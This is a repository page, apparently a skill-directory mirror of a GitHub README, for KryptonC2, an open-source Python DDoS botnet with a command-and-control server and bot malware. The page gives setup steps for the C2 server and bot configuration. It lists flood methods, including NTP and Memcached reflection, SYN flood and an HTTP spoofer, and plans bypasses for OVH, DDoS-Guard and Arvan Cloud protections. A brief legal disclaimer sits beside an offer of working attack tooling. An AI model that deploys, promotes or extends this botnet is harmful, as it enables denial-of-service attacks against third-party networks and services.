SkillAgentSearch skills...

KryptonC2

Krypton C2 is a simple botnet source. Credits Source Code: NixWasHere

Install / Use

/learn @CirqueiraDev/KryptonC2

README

<h1 align="center">Krypton Botnet</h1> <p align="center"> <img src="https://github.com/CirqueiraDev/KryptonC2/assets/118860604/9a1a4346-07bc-477a-b194-6205f9cf2884"> </p> <br>

KryptonC2 is a basic open source denial of service botnet system written in Python 3, consists of a connect and control server and a bot malware script.

<img src="https://user-images.githubusercontent.com/73097560/115834477-dbab4500-a447-11eb-908a-139a6edaec5c.gif"><br>

Installation

  1. Install Git and Python 3 on your server.

  2. Clone the KryptonC2 Github repository to your server via Git: $ git clone https://github.com/CirqueiraDev/KryptonC2.

  3. Change the host address and C&C port in the configuration section in bot.py to your server address and C&C port.

  4. Install the requirements.txt

  5. Start the C2 server by executing the command: $ python main.py.

  6. Add accounts in logins.txt using the format: username:password:yyyy-mm-dd.

  7. Configure the port on the config.json { "cnc_host": "0.0.0.0", "reg_host": "0.0.0.0", "cnc_port": 5511, "reg_port": 5512 }.

  8. Connect to the server through PuTTY on a raw socket connection.

https://github.com/CirqueiraDev/KryptonC2/assets/118860604/39c37798-fba0-4d95-948b-a013c3842ee2

<br>

📍 Compiling the malware and installing it on vulnerable devices won't be told as it's highly illegal to get remote access to devices without permission. Use of this project for illegal activities is at own risk! I'm not responsible for any of your taken actions!

<img src="https://user-images.githubusercontent.com/73097560/115834477-dbab4500-a447-11eb-908a-139a6edaec5c.gif"><br>

<br>

News

  1. New method (HTTP SPOOFER) L7 Method. 11/11/2023
  2. New method (NTP Reflection + Payload) L4 Method. 12/11/2023
  3. New method (Memcached + Custom Payload) L4 Method. 12/11/2023
  4. New method (POD) L3 Method. 13/11/2023
  5. New method (ICMP) L3 Method. 13/11/2023
  6. Updated Method (HTTP IO) L7 Method. 14/11/2023
  7. Added expiration date for accounts (AAAA-MM-DD). 26/11/2023
  8. Update commands and visual. 02/12/2023
  9. New method (SYN Flood) L4 method and (ACK Flood) Removed. 04/12/2023
  10. Update visual and fix bugs. 01/22/2024

Ideas

  1. Method: OVH | Bypass OVH
  2. Method: POST | POST Flood
  3. Method: STRESS | Send HTTP Packet With High Byte
  4. Method: OSTRESS | STRESS Without Proxy
  5. Method: BYPASS | Bypass Normal AntiDDoS
  6. Method: DGB | DDoS Guard Bypass
  7. Method: AVB | Arvan Cloud Bypass
  8. Send attacks with API's
  9. Optimize malicious code
<br>

Owner Code

📌Source: https://github.com/NixWasHere/NixC2

KryptonC2 by:

  • Discord: cirqueira
<div>

Instagram

</div>
View on GitHub
GitHub Stars113
CategoryDevelopment
Updated19d ago
Forks29

Languages

Python

Security Score

85/100

Audited on Mar 9, 2026

No findings